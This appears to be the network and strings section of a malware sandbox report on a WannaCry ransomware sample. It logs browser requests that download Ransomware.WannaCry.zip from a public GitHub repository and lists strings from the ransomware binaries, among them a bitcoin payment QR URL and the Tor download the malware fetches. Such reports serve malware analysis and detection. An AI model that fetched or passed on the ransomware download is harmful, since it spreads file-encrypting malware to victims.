              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/overview-files/master HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/tag-count HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: text/html, application/xhtml+xmlTurbo-Visit: truesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurichIf-None-Match: W/"2e999df221553a6425cb9a1091418301"
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: application/jsonX-Requested-With: XMLHttpRequestGitHub-Verified-Fetch: truesec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurichIf-None-Match: W/"97c18cc82e71efdd5cf716e73ab1e4b4"
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/deferred-metadata/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: application/jsonX-Requested-With: XMLHttpRequestGitHub-Verified-Fetch: truesec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurichIf-None-Match: W/"3ca1cb8ac06e96da0082e70bd7b7c408"
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/latest-commit/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/deferred-metadata/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurichIf-None-Match: W/"3ca1cb8ac06e96da0082e70bd7b7c408"
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=W+gOxC5MR2PNrAs&MD=WW3wwygw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/raw/master/Ransomware.WannaCry.zip HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/master/Ransomware.WannaCry.zip HTTP/1.1Host: raw.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://github.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /chronosmiki/RANSOMWARE-WANNACRY-2.0/master/Ransomware.WannaCry.zip HTTP/1.1Host: raw.githubusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=W+gOxC5MR2PNrAs&MD=WW3wwygw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
              Source: unknownDNS traffic detected: queries for: github.com
              Source: unknownHTTP traffic detected: POST /github/collect HTTP/1.1Host: collector.github.comConnection: keep-aliveContent-Length: 1114sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://github.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
              Source: taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: http://freehaven.net/anonbib/#hs-attack06
              Source: chromecache_814.1.drString found in binary or memory: http://schema.org/SoftwareSourceCode
              Source: m_japanese.wnry.11.drString found in binary or memory: http://schemas.microso
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1426542169.000000000098A000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1423162894.0000000000989000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000045.00000000.1517699744.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004B.00000002.1530960305.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.1524452290.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000052.00000002.1525784125.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.1526743183.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000056.00000002.1528095321.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.1529684373.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.1530691676.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.1531940210.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005F.00000002.1533260086.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000061.00000002.1534786645.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.1536847189.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000064.00000002.1537704878.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000065.00000002.1539090441.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000067.00000002.1540280888.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000068.00000002.1541702331.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000006B.00000002.1543186279.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000006D.00000002.1544404210.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000006F.00000002.1545763104.0000000000421000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1426542169.000000000098A000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1423162894.0000000000989000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000045.00000000.1517699744.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004B.00000002.1530960305.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.1524452290.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000052.00000002.1525784125.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.1526743183.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000056.00000002.1528095321.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.1529684373.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.1530691676.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.1531940210.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005F.00000002.1533260086.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000061.00000002.1534786645.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.1536847189.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000064.00000002.1537704878.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000065.00000002.1539090441.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000067.00000002.1540280888.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000068.00000002.1541702331.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000006B.00000002.1543186279.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000006D.00000002.1544404210.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000006F.00000002.1545763104.0000000000421000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
              Source: @WanaDecryptor@.exe, 00000045.00000003.1539251778.00000000028B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
              Source: chromecache_814.1.drString found in binary or memory: https://api.github.com/_private/browser/errors
              Source: chromecache_814.1.drString found in binary or memory: https://api.github.com/_private/browser/stats
              Source: chromecache_814.1.drString found in binary or memory: https://avatars.githubusercontent.com
              Source: chromecache_814.1.drString found in binary or memory: https://avatars.githubusercontent.com/u/19915931?v=4
              Source: @WanaDecryptor@.exe, 00000045.00000003.1539553722.00000000029B5000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
              Source: @WanaDecryptor@.exe, 00000045.00000003.1539553722.00000000029B5000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayError
              Source: chromecache_814.1.drString found in binary or memory: https://collector.github.com/github/collect
              Source: chromecache_814.1.drString found in binary or memory: https://desktop.github.com
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1930805946.0000000002516000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000004B.00000002.1530917323.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
              Source: @WanaDecryptor@.exe, 0000004B.00000002.1530917323.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
              Source: chromecache_814.1.drString found in binary or memory: https://docs.github.com
              Source: chromecache_814.1.drString found in binary or memory: https://docs.github.com/
              Source: chromecache_814.1.drString found in binary or memory: https://docs.github.com/github/creating-cloning-and-archiving-repositories/creating-a-repository-on-
              Source: chromecache_814.1.drString found in binary or memory: https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax
              Source: chromecache_814.1.drString found in binary or memory: https://docs.github.com/site-policy/github-terms/github-terms-of-service
              Source: chromecache_814.1.drString found in binary or memory: https://docs.github.com/site-policy/privacy-policies/github-privacy-statement
              Source: chromecache_814.1.drString found in binary or memory: https://education.github.com
              Source: chromecache_814.1.drString found in binary or memory: https://github-cloud.s3.amazonaws.com
              Source: chromecache_814.1.drString found in binary or memory: https://github.blog
              Source: chromecache_814.1.drString found in binary or memory: https://github.com
              Source: chromecache_814.1.drString found in binary or memory: https://github.com/
              Source: chromecache_814.1.drString found in binary or memory: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0.git
              Source: chromecache_814.1.drString found in binary or memory: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip"
              Source: chromecache_814.1.drString found in binary or memory: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip?raw=true
              Source: chromecache_814.1.drString found in binary or memory: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/raw/master/Ransomware.WannaCry.zip
              Source: chromecache_814.1.drString found in binary or memory: https://github.com/notifications/beta/shelf
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-94209c43
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-ee3fc84d7fb0.j
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_react-shared_hooks_use-canonical-object_ts
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/behaviors-4e25e265ef84.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/code-ad2fce00d003.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/code-menu-614feb194539.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/dark-a167e256da9c.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-d11f2cf8009b.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-ea7373db06c8.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-9b32204967c6.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/element-registry-fb4b8d40f206.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/environment-27057bd9ed0b.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/github-19c85be4af9c.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/github-elements-369bd99876f6.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/global-c2f8efb9bce8.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-20a011926f27.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/light-0eace2597ca3.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/light_colorblind-af6c685139ba.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-578cdbc8a5a9.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-5cb699a7e247.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/notifications-global-352d84c6cc82.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/primer-f3607eccaaae.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/primer-primitives-366b5c973fad.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/react-code-view-c04a0c63417c.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/react-code-view.959fb0b61e6a1de773e7.module.css
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/react-lib-1fbfc5be2c18.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/repository-6247ca238fd4.css
